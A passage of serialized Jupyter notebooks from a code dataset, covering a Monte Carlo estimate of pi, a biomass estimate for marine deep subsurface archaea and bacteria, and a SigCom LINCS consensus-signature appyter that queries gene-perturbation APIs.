"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"world = [\n (\"result_seq_quad.out\", \"Quadratic\", \"b\", \"\"),\n (\"result_seq_lin.out\", \"Linear\", \"g\", \"\"),\n (\"result_seq_threads.out\", \"Quadratic + Threads\", \"y\", \"\"),\n (\"result_seq_lin_threads.out\", \"Linear + Threads\", \"cyan\", \"--\"),\n (\"result_seq_cuda.out\", \"Quadratic + CUDA\", \"orange\", \"\")\n]\n\nfor fname, label, c, fmt in world:\n df = pd.read_csv(fname)\n group = df.groupby(by=\"psize\")\n plt.errorbar(group.mean().index, group.mean().values, yerr=group.std().values*2, barsabove=True,\n c=c, label=label, ecolor=\"black\", linewidth=4, fmt=fmt)\n\nplt.ylabel(\"Execution time (s)\")\nplt.xlabel(\"Problem size (# amino acids)\")\nplt.legend()\nplt.savefig(\"fig_all.pdf\")\nplt.savefig(\"fig_all.png\", dpi=150)\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb2b76ed188fc5d5c6c96e1681490216eb6996ad | 3,085 | ipynb | Jupyter Notebook | Monte_Carlo_Integration.ipynb | jvelasq9/Astro_119_Nov_27 | 02b762b1d72269d0f14c95bcc2d6bfceb1b518bb | [
"MIT"
] | null | null | null | Monte_Carlo_Integration.ipynb | jvelasq9/Astro_119_Nov_27 | 02b762b1d72269d0f14c95bcc2d6bfceb1b518bb | [
"MIT"
] | null | null | null | Monte_Carlo_Integration.ipynb | jvelasq9/Astro_119_Nov_27 | 02b762b1d72269d0f14c95bcc2d6bfceb1b518bb | [
"MIT"
] | null | null | null | 19.28125 | 63 | 0.488493 | [
[
[
"## Perform a simple Monte Carlo integration to compute Pi",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"### Set some parameters of the integration",
"_____no_output_____"
]
],
[
[
"n = 10000 #number of samples for the integration",
"_____no_output_____"
]
],
[
[
"### Make some uniformy sampled variables[-1,1]",
"_____no_output_____"
]
],
[
[
"x = np.random.uniform(-1,1,n)\ny = np.random.uniform(-1,1,n)",
"_____no_output_____"
]
],
[
[
"### Find the number of samples within the unit circle",
"_____no_output_____"
]
],
[
[
"ir = np.where((x**2 + y**2)<1.0) [0]\nur = np.where((x**2 + y**2)>=1.0) [0]",
"_____no_output_____"
]
],
[
[
"### Plot the samples and the circle",
"_____no_output_____"
]
],
[
[
"fig = plt.figure(figsize=(7,7))\nplt.xlim(-1.1,1.1)\nplt.ylim(-1.1,1.1)\n\nplt.plot(x[ir], y[ir], '.' , color='blue')\nplt.plot(x[ur],y[ur], '.' , color=\"0.75\")\n\ntheta = np.linspace(0,2*np.pi,1000)\n\nxc = np.cos(theta)\nyc = np.sin(theta)\n\nplt.plot(xc,yc,color='green')\n\nplt.xlabel('x')\nplt.ylabel('y')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Report the result for Pi",
"_____no_output_____"
]
],
[
[
"pi_approx = 4.0*len(ir)/float(n)\n\nerror_pi = (pi_approx-np.pi)/np.pi\n\nprint(\"Number of sample\", n)\n\nprint(\"Approximate pi\", pi_approx)\n\nprint(\"Error in approx\",error_pi)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2b7fbcb44850c9a2a2c49dfd858218bee0ccde | 7,699 | ipynb | Jupyter Notebook | bacteria_archaea/marine_deep_subsurface/marine_deep_subsurface_prok_biomass_estimate.ipynb | milo-lab/biomass_distribution | 36cf0a80ec94deb73cb560b66cbd9fa190f528ce | [
"MIT"
] | 21 | 2018-05-22T12:09:11.000Z | 2021-11-04T21:04:43.000Z | bacteria_archaea/marine_deep_subsurface/marine_deep_subsurface_prok_biomass_estimate.ipynb | milo-lab/biomass_distribution | 36cf0a80ec94deb73cb560b66cbd9fa190f528ce | [
"MIT"
] | null | null | null | bacteria_archaea/marine_deep_subsurface/marine_deep_subsurface_prok_biomass_estimate.ipynb | milo-lab/biomass_distribution | 36cf0a80ec94deb73cb560b66cbd9fa190f528ce | [
"MIT"
] | 4 | 2019-03-12T08:56:36.000Z | 2020-11-02T14:13:03.000Z | 35.809302 | 333 | 0.516301 | [
[
[
"#Load dependencies\nimport numpy as np\nimport pandas as pd\npd.options.display.float_format = '{:,.1e}'.format\nimport sys\nsys.path.insert(0, '../../statistics_helper')\nfrom CI_helper import *\nfrom excel_utils import *",
"_____no_output_____"
]
],
[
[
"# Estimating the total biomass of marine deep subsurface archaea and bacteria\n\nWe use our best estimates for the total number of marine deep subsurface prokaryotes, the carbon content of marine deep subsurface prokaryotes and the fraction of archaea and bacteria out of the total population of marine deep subsurface prokaryotes to estimate the total biomass of marine deep subsurface bacteria and archaea.",
"_____no_output_____"
]
],
[
[
"results = pd.read_excel('marine_deep_subsurface_prok_biomass_estimate.xlsx')\nresults",
"_____no_output_____"
]
],
[
[
"We multiply all the relevant parameters to arrive at our best estimate for the biomass of marine deep subsurface archaea and bacteria, and propagate the uncertainties associated with each parameter to calculate the uncertainty associated with the estimate for the total biomass.",
"_____no_output_____"
]
],
[
[
"# Calculate the total biomass of marine archaea and bacteria\ntotal_arch_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][2]\ntotal_bac_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][3]\n\nprint('Our best estimate for the total biomass of marine deep subsurface archaea is %.0f Gt C' %(total_arch_biomass/1e15))\nprint('Our best estimate for the total biomass of marine deep subsurface bacteria is %.0f Gt C' %(total_bac_biomass/1e15))\n\n# Propagate the uncertainty associated with each parameter to the final estimate\n\narch_biomass_uncertainty = CI_prod_prop(results['Uncertainty'][:3])\nbac_biomass_uncertainty = CI_prod_prop(results.iloc[[0,1,3]]['Uncertainty'])\n\nprint('The uncertainty associated with the estimate for the biomass of archaea is %.1f-fold' %arch_biomass_uncertainty)\nprint('The uncertainty associated with the estimate for the biomass of bacteria is %.1f-fold' %bac_biomass_uncertainty)",
"Our best estimate for the total biomass of marine deep subsurface archaea is 3 Gt C\nOur best estimate for the total biomass of marine deep subsurface bacteria is 7 Gt C\nThe uncertainty associated with the estimate for the biomass of archaea is 7.9-fold\nThe uncertainty associated with the estimate for the biomass of bacteria is 7.6-fold\n"
],
[
"# Feed bacteria results to Table 1 & Fig. 1\nupdate_results(sheet='Table1 & Fig1', \n row=('Bacteria','Marine deep subsurface'), \n col=['Biomass [Gt C]', 'Uncertainty'],\n values=[total_bac_biomass/1e15,bac_biomass_uncertainty],\n path='../../results.xlsx')\n\n# Feed archaea results to Table 1 & Fig. 1\nupdate_results(sheet='Table1 & Fig1', \n row=('Archaea','Marine deep subsurface'), \n col=['Biomass [Gt C]', 'Uncertainty'],\n values=[total_arch_biomass/1e15,arch_biomass_uncertainty],\n path='../../results.xlsx')\n\n# Feed bacteria results to Table S1\nupdate_results(sheet='Table S1', \n row=('Bacteria','Marine deep subsurface'), \n col=['Number of individuals'],\n values= results['Value'][0]*results['Value'][3],\n path='../../results.xlsx')\n\n# Feed archaea results to Table S1\nupdate_results(sheet='Table S1', \n row=('Archaea','Marine deep subsurface'), \n col=['Number of individuals'],\n values= results['Value'][0]*results['Value'][2],\n path='../../results.xlsx')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2b802957fc599bef9d9cbb9600c2c1196beacd | 64,586 | ipynb | Jupyter Notebook | appyters/SigCom_LINCS_Consensus_Appyter/SigCom LINCS Consensus Appyter.ipynb | MaayanLab/jupyter-template-catalog | 212b455e62d49f04dcee73bb6eeb5312b71ba8ef | [
"Apache-2.0"
] | null | null | null | appyters/SigCom_LINCS_Consensus_Appyter/SigCom LINCS Consensus Appyter.ipynb | MaayanLab/jupyter-template-catalog | 212b455e62d49f04dcee73bb6eeb5312b71ba8ef | [
"Apache-2.0"
] | 11 | 2020-04-15T22:47:17.000Z | 2020-05-28T16:34:16.000Z | appyters/SigCom_LINCS_Consensus_Appyter/SigCom LINCS Consensus Appyter.ipynb | MaayanLab/appyters | 212b455e62d49f04dcee73bb6eeb5312b71ba8ef | [
"Apache-2.0"
] | 1 | 2020-05-14T20:25:32.000Z | 2020-05-14T20:25:32.000Z | 51.056126 | 927 | 0.457158 | [
[
[
"#%%appyter init\nfrom appyter import magic\nmagic.init(lambda _=globals: _())",
"_____no_output_____"
],
[
"%%appyter hide_code\n{% do SectionField(\n name='PRIMARY',\n title='1. Upload your data',\n subtitle='Upload up and down gene-sets to perform two-sided rank enrichment. '+\n 'Upload up- or down-only gene-sets to perform rank analysis for that direction.',\n img='file-upload.png'\n) %}\n{% do SectionField(\n name='ENRICHMENT',\n title='2. Choose libraries for enrichment',\n subtitle='Select the libraries that would be used for consensus analysis, as well as the Enrichr and '+\n 'Drugmonizome libraries to use for enriching the consensus perturbagens.',\n img='find-replace.png'\n \n) %}\n{% do SectionField(\n name='PARAMETER',\n title='3. Tweak the parameters',\n subtitle='Modify the parameters to suit the needs of your analysis.',\n img='hammer-screwdriver.png'\n) %}",
"_____no_output_____"
],
[
"%%appyter markdown\n\n{% set title = StringField(\n name='title',\n label='Notebook Name',\n default='SigCom LINCS Consensus Signatures',\n section=\"PRIMARY\",\n) %}\n\n# {{ title.raw_value }}",
"_____no_output_____"
]
],
[
[
"The SigCom LINCS hosts ranked L1000 [1] perturbation signatures from a variety of perturbation types including: drugs and other small molecules, CRISPR knockouts, shRNA knockdowns, and single gene overexpression. SigCom LINCS' RESTful APIs enable querying the signatures programmatically to identify mimickers or reversers for input up and down gene sets. This appyter extends this functionality by enabling analysis for a collection of input signatures to identify consistently reoccuring mimickers and reversers. The appyter takes as input a set of two-sided or one-sided gene sets and constructs a score matrix of mimicking and reversing signatures. From this matrix the appyter computes the consensus. The pipeline also includes (1) Clustergrammer [2] interactive heatmap, and (2) enrichment analysis of the top gene perturbations [3-6] to elucidate the pathways that are being targeted by the consensus perturbagens.",
"_____no_output_____"
]
],
[
[
"import re\nimport math\nimport time\nimport requests\nimport pandas as pd\nimport json\nimport scipy.stats as st\nfrom IPython.display import display, IFrame, Markdown, HTML\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom umap import UMAP\nfrom sklearn.manifold import TSNE\nfrom maayanlab_bioinformatics.normalization import quantile_normalize, zscore_normalize\nfrom maayanlab_bioinformatics.harmonization import ncbi_genes_lookup\nfrom tqdm import tqdm\nimport plotly.express as px\nimport numpy as np\nfrom matplotlib.ticker import MaxNLocator",
"_____no_output_____"
],
[
"METADATA_API = \"https://maayanlab.cloud/sigcom-lincs/metadata-api\"\nDATA_API = \"https://maayanlab.cloud/sigcom-lincs/data-api/api/v1\"\nCLUSTERGRAMMER_URL = 'https://maayanlab.cloud/clustergrammer/matrix_upload/'\nS3_PREFIX = \"https://appyters.maayanlab.cloud/storage/LDP3Consensus/\"\ndrugmonizome_meta_api = \"https://maayanlab.cloud/drugmonizome/metadata-api\"\ndrugmonizome_data_api = \"https://maayanlab.cloud/drugmonizome/data-api/api/v1\"\nenrichr_api = 'https://maayanlab.cloud/Enrichr/'",
"_____no_output_____"
],
[
"table = 1\nfigure = 1",
"_____no_output_____"
],
[
"%%appyter code_exec\n\n{% set up_gene_sets = FileField(\n name='up_gene_sets',\n label='Up Gene-sets',\n default='covid19_up.gmt',\n section=\"PRIMARY\",\n examples={\n 'covid19_up.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_up.gmt'\n }\n) %}\n\n{% set down_gene_sets = FileField(\n name='down_gene_sets',\n label='Down Gene-sets',\n default='covid19_down.gmt',\n section=\"PRIMARY\",\n examples={\n 'covid19_down.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_down.gmt'\n }\n) %}\n\n\nup_gene_sets = {{ up_gene_sets }}\ndown_gene_sets = {{ down_gene_sets }}",
"_____no_output_____"
],
[
"gene_set_direction = None\nif up_gene_sets == '':\n gene_set_direction = \"down\"\n print(\"Up gene-sets was not uploaded. Gene-set direction is set to down.\")\nelif down_gene_sets == '':\n gene_set_direction = \"up\"\n print(\"Down gene-sets was not uploaded. Gene-set direction is set to up.\")",
"_____no_output_____"
],
[
"%%appyter code_exec\n\ndatasets = {{ MultiChoiceField(name='datasets',\n label='LINCS Datasets',\n description='Select the LINCS datasets to use for the consensus analysis',\n default=[\n \"LINCS L1000 CRISPR Perturbations (2021)\",\n \"LINCS L1000 Chemical Perturbations (2021)\",\n ],\n section = 'ENRICHMENT',\n choices=[\n \"LINCS L1000 Antibody Perturbations (2021)\",\n \"LINCS L1000 Ligand Perturbations (2021)\",\n \"LINCS L1000 Overexpression Perturbations (2021)\",\n \"LINCS L1000 CRISPR Perturbations (2021)\",\n \"LINCS L1000 shRNA Perturbations (2021)\",\n \"LINCS L1000 Chemical Perturbations (2021)\",\n \"LINCS L1000 siRNA Perturbations (2021)\",\n ]\n ) \n}}\n\ndrugmonizome_datasets = {{ MultiChoiceField(name='drugmonizome_datasets',\n description='Select the Drugmonizome libraries to use for the enrichment analysis of the consensus drugs',\n label='Drugmonizome Libraries',\n default=[\"L1000FWD_GO_Biological_Processes_drugsetlibrary_up\", \"L1000FWD_GO_Biological_Processes_drugsetlibrary_down\"],\n section = 'ENRICHMENT',\n choices=[\n \"L1000FWD_GO_Biological_Processes_drugsetlibrary_up\",\n \"L1000FWD_GO_Biological_Processes_drugsetlibrary_down\",\n \"L1000FWD_GO_Cellular_Component_drugsetlibrary_up\",\n \"L1000FWD_GO_Cellular_Component_drugsetlibrary_down\",\n \"L1000FWD_GO_Molecular_Function_drugsetlibrary_up\",\n \"L1000FWD_GO_Molecular_Function_drugsetlibrary_down\",\n \"L1000FWD_KEGG_Pathways_drugsetlibrary_up\",\n \"L1000FWD_KEGG_Pathways_drugsetlibrary_down\",\n \"L1000FWD_signature_drugsetlibrary_up\",\n \"L1000FWD_signature_drugsetlibrary_down\",\n \"L1000FWD_predicted_side_effects\",\n \"KinomeScan_kinase_drugsetlibrary\",\n \"Geneshot_associated_drugsetlibrary\",\n \"Geneshot_predicted_generif_drugsetlibrary\",\n \"Geneshot_predicted_coexpression_drugsetlibrary\",\n \"Geneshot_predicted_tagger_drugsetlibrary\",\n \"Geneshot_predicted_autorif_drugsetlibrary\",\n \"Geneshot_predicted_enrichr_drugsetlibrary\",\n \"SIDER_indications_drugsetlibrary\",\n \"SIDER_side_effects_drugsetlibrary\",\n \"DrugRepurposingHub_target_drugsetlibrary\",\n \"ATC_drugsetlibrary\",\n \"Drugbank_smallmolecule_target_drugsetlibrary\",\n \"Drugbank_smallmolecule_enzyme_drugsetlibrary\",\n \"Drugbank_smallmolecule_carrier_drugsetlibrary\",\n \"Drugbank_smallmolecule_transporter_drugsetlibrary\",\n \"STITCH_target_drugsetlibrary\",\n \"PharmGKB_OFFSIDES_side_effects_drugsetlibrary\",\n \"CREEDS_signature_drugsetlibrary_down\",\n \"CREEDS_signature_drugsetlibrary_up\",\n \"RDKIT_maccs_fingerprints_drugsetlibrary\",\n \"DrugCentral_target_drugsetlibrary\",\n \"PubChem_fingerprints_drugsetlibrary\",\n \"DrugRepurposingHub_moa_drugsetlibrary\",\n \"PharmGKB_snp_drugsetlibrary\"\n ]\n ) \n}}\n\ntranscription_libraries = {{ MultiChoiceField(name='transcription_libraries', \n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Transcription Libraries', \n default=[], \n section = 'ENRICHMENT',\n choices=[\n 'ARCHS4_TFs_Coexp',\n 'ChEA_2016',\n 'ENCODE_and_ChEA_Consensus_TFs_from_ChIP-X',\n 'ENCODE_Histone_Modifications_2015',\n 'ENCODE_TF_ChIP-seq_2015',\n 'Epigenomics_Roadmap_HM_ChIP-seq',\n 'Enrichr_Submissions_TF-Gene_Coocurrence',\n 'Genome_Browser_PWMs',\n 'lncHUB_lncRNA_Co-Expression',\n 'miRTarBase_2017',\n 'TargetScan_microRNA_2017',\n 'TF-LOF_Expression_from_GEO',\n 'TF_Perturbations_Followed_by_Expression',\n 'Transcription_Factor_PPIs',\n 'TRANSFAC_and_JASPAR_PWMs',\n 'TRRUST_Transcription_Factors_2019']) \n }}\n\n\npathways_libraries = {{ MultiChoiceField(name='pathways_libraries',\n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Pathway Libraries',\n default=[],\n section = 'ENRICHMENT',\n choices=[\n 'ARCHS4_Kinases_Coexp',\n 'BioCarta_2016',\n 'BioPlanet_2019',\n 'BioPlex_2017',\n 'CORUM',\n 'Elsevier_Pathway_Collection',\n 'HMS_LINCS_KinomeScan',\n 'HumanCyc_2016',\n 'huMAP',\n 'KEA_2015',\n 'KEGG_2021_Human',\n 'KEGG_2019_Mouse',\n 'Kinase_Perturbations_from_GEO_down',\n 'Kinase_Perturbations_from_GEO_up',\n 'L1000_Kinase_and_GPCR_Perturbations_down',\n 'L1000_Kinase_and_GPCR_Perturbations_up',\n 'NCI-Nature_2016',\n 'NURSA_Human_Endogenous_Complexome',\n 'Panther_2016',\n 'Phosphatase_Substrates_from_DEPOD',\n 'PPI_Hub_Proteins',\n 'Reactome_2016',\n 'SILAC_Phosphoproteomics',\n 'SubCell_BarCode',\n 'Virus-Host_PPI_P-HIPSTer_2020',\n 'WikiPathway_2021_Human',\n 'WikiPathways_2019_Mouse']) \n }} \n \n \nontologies_libraries = {{ MultiChoiceField(name='ontologies_libraries', \n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Ontology Libraries',\n default=['GO_Biological_Process_2021'],\n section = 'ENRICHMENT',\n choices=[\n 'GO_Biological_Process_2021',\n 'GO_Cellular_Component_2021',\n 'GO_Molecular_Function_2021',\n 'Human_Phenotype_Ontology',\n 'Jensen_COMPARTMENTS',\n 'Jensen_DISEASES',\n 'Jensen_TISSUES',\n 'MGI_Mammalian_Phenotype_Level_4_2021']) \n }} \n\n \ndiseases_drugs_libraries = {{ MultiChoiceField(name='diseases_drugs_libraries',\n description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',\n label='Enrichr Disease/Drug Libraries',\n default=[],\n section = 'ENRICHMENT',\n choices=[ \n 'Achilles_fitness_decrease',\n 'Achilles_fitness_increase',\n 'ARCHS4_IDG_Coexp',\n 'ClinVar_2019',\n 'dbGaP',\n 'DepMap_WG_CRISPR_Screens_Broad_CellLines_2019',\n 'DepMap_WG_CRISPR_Screens_Sanger_CellLines_2019',\n 'DisGeNET',\n 'DrugMatrix',\n 'DSigDB',\n 'GeneSigDB',\n 'GWAS_Catalog_2019',\n 'LINCS_L1000_Chem_Pert_down',\n 'LINCS_L1000_Chem_Pert_up',\n 'LINCS_L1000_Ligand_Perturbations_down',\n 'LINCS_L1000_Ligand_Perturbations_up',\n 'MSigDB_Computational',\n 'MSigDB_Oncogenic_Signatures',\n 'Old_CMAP_down',\n 'Old_CMAP_up',\n 'OMIM_Disease',\n 'OMIM_Expanded',\n 'PheWeb_2019',\n 'Rare_Diseases_AutoRIF_ARCHS4_Predictions',\n 'Rare_Diseases_AutoRIF_Gene_Lists',\n 'Rare_Diseases_GeneRIF_ARCHS4_Predictions',\n 'Rare_Diseases_GeneRIF_Gene_Lists',\n 'UK_Biobank_GWAS_v1',\n 'Virus_Perturbations_from_GEO_down',\n 'Virus_Perturbations_from_GEO_up',\n 'VirusMINT']) \n }}",
"_____no_output_____"
],
[
"%%appyter code_exec\nalpha = {{FloatField(name='alpha', label='p-value cutoff', default=0.05, section='PARAMETER')}}\nmin_sigs = {{IntField(name='min_sigs',\n label='min_sigs',\n description='Minimum number of input gene sets that has the same hit required to consider it as a consensus signature',\n default=2, section='PARAMETER')}}\ntop_perts = {{IntField(name='top_perts', label='top signatures', default=100, section='PARAMETER')}}\nconsensus_method = {{ ChoiceField(\n name='consensus_method',\n label='consensus method',\n description='Please select a method for getting the consensus',\n default='z-score',\n choices={\n 'z-score': \"'z-score'\",\n 'top count': \"'count'\",\n },\n section='PARAMETER') }}\n",
"_____no_output_____"
]
],
[
[
"## Gene Harmonization\nTo ensure that the gene names are consistent throughout the analysis, the input gene sets are harmonized to NCBI Gene symbols [7-8] using an [in-house gene harmonization module](https://github.com/MaayanLab/maayanlab-bioinformatics).",
"_____no_output_____"
]
],
[
[
"ncbi_lookup = ncbi_genes_lookup('Mammalia/Homo_sapiens')\nprint('Loaded NCBI genes!')",
"_____no_output_____"
],
[
"signatures = {}\nif not up_gene_sets == '':\n with open(up_gene_sets) as upfile:\n for line in upfile:\n unpacked = line.strip().split(\"\\t\")\n if len(unpacked) < 3:\n raise ValueError(\"GMT is not formatted properly, please consult the README of the appyter for proper formatting\")\n sigid = unpacked[0]\n geneset = unpacked[2:]\n genes = []\n for i in geneset:\n gene = i.split(\",\")[0]\n gene_name = ncbi_lookup(gene.upper())\n if gene_name:\n genes.append(gene_name)\n signatures[sigid] = {\n \"up_genes\": genes,\n \"down_genes\": []\n }\nif not down_gene_sets == '':\n with open(down_gene_sets) as downfile:\n for line in downfile:\n unpacked = line.strip().split(\"\\t\")\n if len(unpacked) < 3:\n raise ValueError(\"GMT is not formatted properly, please consult the README of the appyter for proper formatting\")\n sigid = unpacked[0]\n geneset = unpacked[2:]\n if sigid not in signatures and gene_set_direction == None:\n raise ValueError(\"%s did not match any of the up signatures, make sure that the signature names are the same for both up and down genes\"%sigid)\n else:\n genes = []\n for i in geneset:\n gene = i.split(\",\")[0]\n gene_name = ncbi_lookup(gene)\n if gene_name:\n genes.append(gene_name)\n if sigid in signatures:\n signatures[sigid][\"down_genes\"] = genes\n else:\n signatures[sigid] = {\n \"up_genes\": [],\n \"down_genes\": genes\n }",
"_____no_output_____"
]
],
[
[
"## Input Signatures Metadata",
"_____no_output_____"
]
],
[
[
"enrichr_libraries = transcription_libraries + pathways_libraries + ontologies_libraries + diseases_drugs_libraries",
"_____no_output_____"
],
[
"dataset_map = {\n \"LINCS L1000 Antibody Perturbations (2021)\": \"l1000_aby\",\n \"LINCS L1000 Ligand Perturbations (2021)\": \"l1000_lig\",\n \"LINCS L1000 Overexpression Perturbations (2021)\": \"l1000_oe\",\n \"LINCS L1000 CRISPR Perturbations (2021)\": \"l1000_xpr\",\n \"LINCS L1000 shRNA Perturbations (2021)\": \"l1000_shRNA\",\n \"LINCS L1000 Chemical Perturbations (2021)\": \"l1000_cp\",\n \"LINCS L1000 siRNA Perturbations (2021)\": \"l1000_siRNA\"\n}\n\nlabeller = {\n \"LINCS L1000 Antibody Perturbations (2021)\": \"antibody\",\n \"LINCS L1000 Ligand Perturbations (2021)\": \"ligand\",\n \"LINCS L1000 Overexpression Perturbations (2021)\": \"overexpression\",\n \"LINCS L1000 CRISPR Perturbations (2021)\": \"CRISPR\",\n \"LINCS L1000 shRNA Perturbations (2021)\": \"shRNA\",\n \"LINCS L1000 Chemical Perturbations (2021)\": \"chemical\",\n \"LINCS L1000 siRNA Perturbations (2021)\": \"siRNA\"\n}\n\ngene_page = {\n \"LINCS L1000 Ligand Perturbations (2021)\",\n \"LINCS L1000 Overexpression Perturbations (2021)\",\n \"LINCS L1000 CRISPR Perturbations (2021)\",\n \"LINCS L1000 shRNA Perturbations (2021)\",\n \"LINCS L1000 siRNA Perturbations (2021)\"\n}\n\ndrug_page = {\n \"LINCS L1000 Chemical Perturbations (2021)\": \"l1000_cp\",\n}",
"_____no_output_____"
]
],
[
[
"## SigCom LINCS Signature Search\nSigCom LINCS provides RESTful APIs to perform rank enrichment analysis on two-sided (up and down) gene-sets or one-sided (up-only, down-only) gene sets to get mimicking and reversing signatures that are ranked by z-score (one-sided gene-sets) or z-sum (absolute value sum of the z-scores of the up and down gene-sets for two-sided analysis).",
"_____no_output_____"
]
],
[
[
"# functions\ndef convert_genes(up_genes=[], down_genes=[]):\n try:\n payload = {\n \"filter\": {\n \"where\": {\n \"meta.symbol\": {\"inq\": up_genes + down_genes}\n }\n }\n }\n timeout = 0.5\n for i in range(5):\n res = requests.post(METADATA_API + \"/entities/find\", json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n results = res.json()\n up = set(up_genes)\n down = set(down_genes)\n if len(up_genes) == 0 or len(down_genes) == 0:\n converted = {\n \"entities\": [],\n }\n else:\n converted = {\n \"up_entities\": [],\n \"down_entities\": []\n }\n for i in results:\n symbol = i[\"meta\"][\"symbol\"]\n if \"entities\" in converted:\n converted[\"entities\"].append(i[\"id\"])\n elif symbol in up:\n converted[\"up_entities\"].append(i[\"id\"])\n elif symbol in down:\n converted[\"down_entities\"].append(i[\"id\"])\n return converted\n except Exception as e:\n print(e)\n\n\ndef signature_search(genes, library):\n try:\n payload = {\n **genes,\n \"database\": library,\n \"limit\": 500,\n }\n timeout = 0.5\n for i in range(5):\n endpoint = \"/enrich/rank\" if \"entities\" in payload else \"/enrich/ranktwosided\"\n res = requests.post(DATA_API + endpoint, json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n \n return res.json()[\"results\"]\n except Exception as e:\n print(e)\n\ndef resolve_rank(s, gene_set_direction):\n try:\n sigs = {}\n for i in s:\n if i[\"p-value\"] < alpha:\n uid = i[\"uuid\"]\n direction = \"up\" if i[\"zscore\"] > 0 else \"down\"\n if direction == gene_set_direction:\n i[\"type\"] = \"mimicker\"\n sigs[uid] = i\n else:\n i[\"type\"] = \"reverser\"\n sigs[uid] = i\n \n payload = {\n \"filter\": {\n \"where\": {\n \"id\": {\"inq\": list(sigs.keys())}\n },\n \"fields\": [\n \"id\",\n \"meta.pert_name\",\n \"meta.pert_type\",\n \"meta.pert_time\",\n \"meta.pert_dose\",\n \"meta.cell_line\",\n \"meta.local_id\"\n ]\n }\n }\n timeout = 0.5\n for i in range(5):\n res = requests.post(METADATA_API + \"/signatures/find\", json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n results = res.json()\n signatures = {\n \"mimickers\": {},\n \"reversers\": {}\n }\n for sig in results:\n uid = sig[\"id\"]\n scores = sigs[uid]\n sig[\"scores\"] = scores\n if \"pert_name\" in sig[\"meta\"]:\n local_id = sig[\"meta\"].get(\"local_id\", None)\n if scores[\"type\"] == \"mimicker\":\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"mimickers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n \"z-score\": abs(scores.get(\"zscore\", 0)),\n \"p-value\": scores.get(\"p-value\", 0)\n }\n elif scores[\"type\"] == \"reverser\":\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"reversers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n \"z-score\": abs(scores.get(\"zscore\", 0)),\n \"p-value\": scores.get(\"p-value\", 0)\n }\n return signatures\n\n except Exception as e:\n print(e)\n\n\ndef resolve_ranktwosided(s):\n try:\n sigs = {}\n for i in s:\n if i['p-down'] < alpha and i['p-up'] < alpha:\n uid = i[\"uuid\"]\n i['z-sum (abs)'] = abs(i['z-sum'])\n if i['z-sum'] > 0:\n i[\"type\"] = \"mimicker\"\n sigs[uid] = i\n elif i['z-sum'] < 0:\n i[\"type\"] = \"reverser\"\n sigs[uid] = i\n \n payload = {\n \"filter\": {\n \"where\": {\n \"id\": {\"inq\": list(sigs.keys())}\n },\n \"fields\": [\n \"id\",\n \"meta.pert_name\",\n \"meta.pert_type\",\n \"meta.pert_time\",\n \"meta.pert_dose\",\n \"meta.cell_line\",\n \"meta.local_id\"\n ]\n }\n }\n timeout = 0.5\n for i in range(5):\n res = requests.post(METADATA_API + \"/signatures/find\", json=payload)\n if res.ok:\n break\n else:\n time.sleep(timeout)\n if res.status_code >= 500:\n timeout = timeout * 2\n else:\n raise Exception(res.text)\n results = res.json()\n signatures = {\n \"mimickers\": {},\n \"reversers\": {}\n }\n for sig in results:\n uid = sig[\"id\"]\n scores = sigs[uid]\n sig[\"scores\"] = scores\n if \"pert_name\" in sig[\"meta\"]:\n local_id = sig[\"meta\"].get(\"local_id\", None)\n if scores[\"type\"] == \"mimicker\" and len(signatures[\"mimickers\"]) < 100:\n pert_name = sig[\"meta\"].get(\"pert_name\", None)\n local_id = \"%s_%s\"%(pert_name, local_id.replace(\"_%s\"%pert_name, \"\"))\n signatures[\"mimickers\"][local_id] = {\n \"pert_name\": sig[\"meta\"].get(\"pert_name\", None),\n \"pert_time\": sig[\"meta\"].get(\"pert_time\", None),\n \"pert_dose\": sig[\"meta\"].get(\"pert_dose\", None),\n \"cell_line\": sig[\"meta\"].get(\"cell_line\", None),\n 